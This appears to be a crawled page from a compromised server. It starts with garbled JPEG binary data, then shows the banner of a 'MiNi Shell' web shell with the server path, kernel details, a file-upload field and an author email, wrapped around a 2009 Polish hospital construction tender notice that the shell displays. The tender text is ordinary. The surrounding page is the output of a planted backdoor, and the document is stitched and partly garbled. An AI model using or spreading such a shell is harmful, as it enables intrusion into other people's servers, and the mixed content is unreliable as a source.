JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090729/257614-N-2009.html

<p class="kh_header"><b>Gdańsk: PN-63/12/2009/SE/AKUMULATORNIA</b><br>
<b>Numer ogłoszenia: 257614 - 2009; data zamieszczenia: 29.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny św. Wojciecha Adalberta Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Jana Pawła II 50, 80-462 Gdańsk, woj. pomorskie, tel. (058) 556 45 15, 7684281, faks (058) 556 36 18, 7614629.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN-63/12/2009/SE/AKUMULATORNIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 
1. Wykonanie robót budowlano-adaptacyjnych magazynów z pomieszczeń magazynowych o powierzchni ok. 67 m2 na akumulatornię akumulatorów zasadowych szpitala Zamawiającego, w zakresie:
1.1  Roboty ogólnobudowlane, demontażowe i wykończeniowe
 1.2 Klimatyzacja:
-  dostawa i montaż centrali klimatyzacyjnej - centrala nawiewna o wydajności 2000 m3/minutę,
 -  chłodnictwo - dostawa i montaż agregatu wody lodowej,  
 -  dostawa i montaż centrali wywiewnej o wydajności 1700 m3/h,
 -  instalacja wentylacyjna - z blachy stalowej, prostokątne, typ A/1 o obwodzie do 1800 mm,
 -  instalacja elektryczna - wymiana przewodów kabelkowych o łącznym przekroju żył do 7,5 mm2 na istniejącym podłożu z mocowaniem,
1.3 Chłodnictwo:
- dostawa i montaż zbiornika leżącego (mały) typu ZLm75 układ U1 i U2 o masie 145 kg
- dostawa i montaż agregatu i sprężarki chłodniczych tłokowych, rotacyjne i śrubowe,
- instalacja elektryczna z automatyką wraz z rozdzielnicą elektryczna, automatyką i sterownikiem mikroprocesorowym.
2. Wykonanie robót budowlano-adaptacyjnych w pomieszczeniu po akumulatorni o powierzchni ok. 72 m2 na cele szatni dla personelu szpitala Zamawiającego, w zakresie:
 2.1 Roboty ogólnobudowlane i wykończeniowe:
 2.2  Instalacje Wod-Kan.  
2.3  Instalacje C.O.
2.4  Instalacje wentylacji.
2.5  Instalacje elektryczne.
2.6  Centrala klimatyzacyjna AHU-1:
 - demontaż  starej centrali wentylacyjnej,
  - dostawa i montaż nowej centrali wraz z wyposażeniem.
2.7  Centrala wywiewna:
  - sprężarki powietrzne i gazowe z napędem przez sprzęgło lub pasy klinowe,
  - przepustnice wielopłaszczyznowe stalowe, prostokątne, typ A,
2.8  Instalacja wentylacji:
  - przewody wentylacyjne prostokątne, typ A/1.
2.9  Instalacje elektryczne.
2.10 Wentylacja - prace budowlane. 

Zadanie nr 2
1. Wykonanie robót budowlano-adaptacyjnych w szatniach personelu (pomieszczenia nr 09; 010; 011; 012) o powierzchni łącznej ok. 206 m2 dla personelu szpitala Zamawiającego, w zakresie:
     1.1  Roboty ogólnobudowlane.
     1.2. Instalacje Wod-Kan.
     1.3  Instalacje C.O.
     1.4  Instalacje wentylacji - przewody wentylacyjne prostokątne, typ A/1.
     1.5  Instalacje elektryczne.
1. Zamawiający informuje, że roboty elektryczne (podłączenie akumulatorów) i prace związane z przeniesieniem akumulatorów  wykona we własnym zakresie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zadanie nr 1 - 7000 PLN;  Zadanie nr 2 - 2800 PLN;<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

3.1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że zakres działalności gospodarczej wykonawcy odpowiada profilowi robót objętych postępowaniem oraz oświadczenie zgodne z art. 22 ust. 1 ustawy.
3.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
 - Zadanie nr 1 - wykonanie min. 3 roboty budowlano-adaptacyjne, każda z nich na min. 300.000 zł. oraz załączenie dokumentów potwierdzających należyte ich wykonanie,
 -  Zadanie nr 2 - wykonanie min. 3 roboty budowlano-adaptacyjne, każda z nich na min. 200.000 zł. oraz załączenie dokumentów potwierdzających należyte ich wykonanie
 -  Zadanie nr 1 i nr 2 - wykaz osób zdolnych wykonać zamówienie (z branży budowlanej), min. 4 osoby (dla każdego zadania) zatrudnione o umowę o pracę posiadające uprawnienia z branży budowlanej.
3.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - Wykonawca posiada rachunek o wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę nie mniejszą niż:
Zadanie nr 1 - 200.000 zł.
Zadanie nr 2 - 100.000 zł.
3.4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych - załączenie do oferty oświadczenia.
3.5.Spełniają wszystkie warunki udziału w przedmiotowym postępowaniu - załączenie do oferty oświadczenia zgodnego z art. 44 ustawy

Sposób dokonywania oceny ww. warunków będzie odbywał się wg zasady 
spełnia/nie spełnia (druk ZP-17) na podstawie załączonych do oferty oświadczeń i dokumentów, których wykaz został określony w pkt 3 i 4 SIWZ, składanych w celu potwierdzenia spełniania warunków udziału w postępowaniu o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4.1. Oświadczenie, że Wykonawca spełnia wymogi określone w art. 22 ust. 1 i art. 24 ustawy  stanowiące załącznik nr 3 do SIWZ. W przypadku składania oferty przez konsorcjum, powyższe oświadczenie składa lider konsorcjum oraz podpisuje każdy z podmiotów występujących wspólnie, łącznie z liderem konsorcjum;
 4.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, że Wykonawca jest uprawniony do występowania w obrocie prawnym, potwierdzające, że zakres działalności gospodarczej wykonawcy odpowiada profilowi usług/dostaw objętych postępowaniem, ze wskazaniem osób upoważnionych do wykonywania czynności prawnych w imieniu Wykonawcy, wystawiony/uaktualniony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4.3 Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.: wypełniony Wykaz osób, biorących udział w realizacji przedmiotu zamówienia wraz z kopiami uprawnienień  stwierdzających  posiadanie przygotowania zawodowego oraz aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa;
 4.4  Wykaz wykonanych robót, zgodnie z przedmiotem zamówienia, w okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym krótszym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem: ich wartości, daty i miejsca wykonywania, oraz załączenie dokumentów (referencji) od podmiotów na rzecz których zostały wykonane, potwierdzające, należyte wykonanie przedmiotu zamówienia - zgodnie z pkt. 3.2; 
4.5 Wykaz osób (które będą uczestniczyć przy wykonywaniu zadania), zatrudnionych o umowę o pracę przez Wykonawcę na czas nieokreślony (zgodnie z pkt. 3.2) do ofert należy dołączyć:
  a) wykaz osób zatrudnionych o umowę o pracę posiadających kwalifikacje i doświadczenie zawodowe, zgodnie z pkt. 3 SIWZ, jak niżej:
  - kserokopię umów i/lub potwierdzenie ilości zatrudnionych pracowników kserokopią deklaracji DRA wysyłanej do ZUS, poświadczone za zgodność z oryginałem;
 - informację na temat kwalifikacji zawodowych w/w osób (przynajmniej po jednej osobie z każdej branży występującej w przetargu);
 -  a dla uprawnień elektrycznych E i D z pomiarami; 
4.6  Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmująca termin realizacji robót;
4.7 Informacja banku lub spółdzielni kasy oszczędnościowo-kredytowej, w których Wykonawca posiada podstawowy rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy potwierdzającej, że Wykonawca posiada środki finansowe w wysokości minimum:
Zadanie nr 1 - 200.000 zł.;
Zadanie nr 2 - 100.000 zł.;
 informacja wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4.8 Oświadczenie Wykonawcy o spełnieniu warunków udziału w przedmiotowym postępowaniu, zgodnie z art. 44 ustawy - Pzp.; 
4.9 Potwierdzenia wniesienia wadium -poświadczone przez bank..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.gda.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiający - pok. 092 i/lub strona internetowa jak IV.3.1).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2009 godzina 12:00, miejsce: Zamawiający, pok. 44 - Sekretaria Dyrektora.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> UWAGA
Do Zadania nr 1 - termin wykonania do 60 dni

Creat By MiNi SheLL
Email: jattceo@gmail.com